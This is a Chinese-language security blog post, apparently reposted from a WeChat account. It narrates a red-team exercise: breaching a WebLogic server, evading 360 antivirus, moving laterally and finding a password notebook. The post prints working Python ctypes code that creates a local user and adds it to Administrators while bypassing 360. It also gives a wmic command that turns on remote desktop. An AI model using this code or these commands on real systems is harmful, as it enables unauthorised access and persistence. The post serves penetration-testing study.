突破 Weblogic盘下整个内网

admin

138985
文章

114
评论

2024年7月4日00:03:29评论10 views字数 2495阅读8分19秒阅读模式

正文

演练中找到一处weblogic404报错，使用很多工具都没有利用成功，通过github找到weblogic一把梭哈利用工具，命令执行失败，随手尝试一发注入内存马，居然有返回，真是梭哈出奇迹。

突破 Weblogic盘下整个内网

信息收集发现Windows2003带360主动防御。

突破 Weblogic盘下整个内网

用一下Github上老表的frp，给这360过了。

https://github.com/seventeenman/Forest

突破 Weblogic盘下整个内网

代理有了就开始内网大操作了。

既然权限够高。直接python编写windows-api绕过360创建用户。

import ctypesfrom ctypes import wintypesfrom ctypes import *import sys



USER_PRIV_GUEST = 0USER_PRIV_USER = 1USER_PRIV_ADMIN = 2UF_SCRIPT = 1UF_NORMAL_ACCOUNT = 512LPBYTE = POINTER(c_byte)



class USER_INFO_1(ctypes.Structure):    _fields_ = [        (            'usri1_name', wintypes.LPWSTR),        (            'usri1_password', wintypes.LPWSTR),        (            'usri1_password_age', wintypes.DWORD),        (            'usri1_priv', wintypes.DWORD),        (            'usri1_home_dir', wintypes.LPWSTR),        (            'usri1_comment', wintypes.LPWSTR),        (            'usri1_flags', wintypes.DWORD),        (            'usri1_script_path', wintypes.LPWSTR)]



class _LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):    _fields_ = [        (            'lgrmi3_domainandname', wintypes.LPWSTR)]



def adduser(username='admin1234', password='admin@1234'):    ui = USER_INFO_1()    ui.usri1_name = username    ui.usri1_password = password    ui.usri1_priv = USER_PRIV_USER    ui.usri1_home_dir = None    ui.usri1_comment = None    ui.usri1_flags = UF_SCRIPT    ui.usri1_script_path = None    a = ctypes.windll.Netapi32.NetUserAdd(None, 1, ui, None)    if a == 0:        print("tambah pengguna success : nama={} kata laluan={}".format(username,password))    else:        print('tambah pengguna pengguna ralat')    return



def addgroup(username='Test1234', groupname='Administrators'):    name = _LOCALGROUP_MEMBERS_INFO_3()    name.lgrmi3_domainandname = username    ctypes.windll.Netapi32.NetLocalGroupAddMembers.argtypes = (        wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.DWORD, LPBYTE, wintypes.DWORD)    b = ctypes.windll.Netapi32.NetLocalGroupAddMembers(None, groupname,3, LPBYTE(name),1)    if b == 0:        print("Tambah ke kumpulan success : nama={} kumpulan={}".format(username,groupname))    else:        print('Tambah ke kumpulan ralat')    return



def main():    if len(sys.argv) == 1:        adduser()        addgroup()    elif len(sys.argv) == 3:        adduser(str(sys.argv[1]), str(sys.argv[2]))        addgroup(str(sys.argv[1]))    elif len(sys.argv) == 4:        adduser(str(sys.argv[1]), str(sys.argv[2]))        addgroup(str(sys.argv[1]), str(sys.argv[3]))    else:        print('usage: {} username password').format(sys.argv[1])        print('usage: {} username password groupname').format(sys.argv[1])



if __name__ == '__main__':    main()

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

上来桌面就给他360退了，创建号用户上来看一眼桌面，这位阿瑟电脑上真干净。（好像看到了qax公司得天擎，不过没有关系，关不掉可以改拦截规则）

突破 Weblogic盘下整个内网

横向找到另一台Weblogic

突破 Weblogic盘下整个内网

相同操作，拿到另一台远程桌面。

突破 Weblogic盘下整个内网

啊？？？？这就是传说中的，密码本。

突破 Weblogic盘下整个内网

猜测打到运维机了，使用SelectMyParent切入到administrator桌面，简直辣眼睛。

突破 Weblogic盘下整个内网

临近YL结束，跟着密码本翻阅了所有机器，没有拿下靶标。

该收工了，从通讯录拿到靶标系统负责人，给钓鱼老表留个言，我就撤了。

突破 Weblogic盘下整个内网

总结

经过很多年GFYL，各地EDR也是部署相当完备，免杀绕过杀软EDR也慢慢成为家常便饭，这里也只是提供一种短小精悍得绕过思路。

原文始发于微信公众号（迪哥讲事）：突破 Weblogic盘下整个内网

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

突破 Weblogic盘下整个内网

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

记一次对湾湾站点的getshell到网

一个被遗忘的 API 端点让我赚了 $500

使用burpsuite爆破带有验证码和随机uuid的密码的一次经验

RAG 受到攻击：LLM 漏洞如何影响真实系统

某次211大学的渗透测试过程

源码泄露发现

发表评论

在线咨询

微信